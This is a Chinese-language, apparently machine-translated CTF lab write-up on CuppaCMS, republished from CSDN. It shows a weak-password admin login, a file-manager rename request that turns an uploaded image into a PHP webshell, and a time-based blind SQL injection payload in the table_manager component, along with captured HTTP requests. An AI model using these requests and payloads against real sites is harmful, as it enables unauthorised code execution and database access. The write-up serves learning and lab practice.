简介
CuppaCMS 是一个内容管理系统(CMS)。 2019 年11 月12 日之前的CuppaCMS 版本包含一个安全漏洞,攻击者可能会利用该漏洞使用文件管理器提供的重命名功能的自定义请求来上传扩展程序中的恶意文件。 PHP可能导致远程任意代码执行。
/components/table_manager/路径下存在SQL注入
过程
开放范围
登录后台admin/admin的弱密码
找到文件上传位置并允许仅上传图片
上传后,将文件后缀更改为php并抓包。
抓包数据如下
POST /js/filemanager/api/index.php HTTP/1.1
主机: eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com
用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:127.0)Gecko/20100101 Firefox/127.0
接受: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip、deflate
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com/js/filemanager/index.php
内容类型: 应用程序/json
内容长度: 59
来源: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com
关闭连接:
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363;chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O;会话=6 88e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; PHPSESSID=0rvs895vqjskasibtu khf8m0 a2; 2F%2Feci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com%2F管理员_文档_路径=%2F;
优先级: u=1
{\’from\’:\’//asd.php.png\’,\’to\’:\’//asd.php\’,\’action\’:\’重命名\’}
修改成功后,放入包中。更改成功后,删除.htaccess 文件,然后使用Ant Sword 进行连接。
获取标志{047b0831-949e-41f3-84f1-49859eb6bebf}
附加
在测试过程中,我们还发现存在SQL注入漏洞。
查找并搜索权限-分组并抓包
抓包数据如下
POST /components/table_manager/HTTP/1.1
主机: eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com
用户代理: Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:127.0)Gecko/20100101 Firefox/127.0
接受: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip、deflate
Content-Type: application/x-www-form-urlencoded; 字符集=UTF-8
X-Requested-With: XMLHttpRequest
内容长度: 150
来源: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com
关闭连接:
Referer: http://eci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com/
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718849866,1718896116,1719242501,1719395363; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; 688e0a110412c17b0a7e0a5ad4cdf894cf99798b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1719395439; PHPSESSID=0rvs895vqjskasibtu khf8m0 a2; A%2F%2Feci-2ze48eddxtrl7tgppkyz.cloudec1.ichunqiu.com%2F管理员_文档_路径=%2F;
优先级: u=1
search_word=123filter_lang=order_by=idorder_orientation=ASCpath=组件%2Ftable_manager%2Fview%2Fcu_menusuniqueClass=wrapper_content_897880
扔进sqlmap并运行
获取有效负载
search_word=123filter_lang=\’ AND (SELECT 5543 FROM (SELECT(SLEEP(5)))JJri) AND \’XiZL\’=\’XiZLorder_by=idorder_orientation=ASCpath=component/table_manager/view/cu_menusuniqueClass=wrapper_content_897880
已发布的数据库有:
炸药
由于未找到该标志,测试未继续。
以上有关#CVE的相关内容来源仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92267.html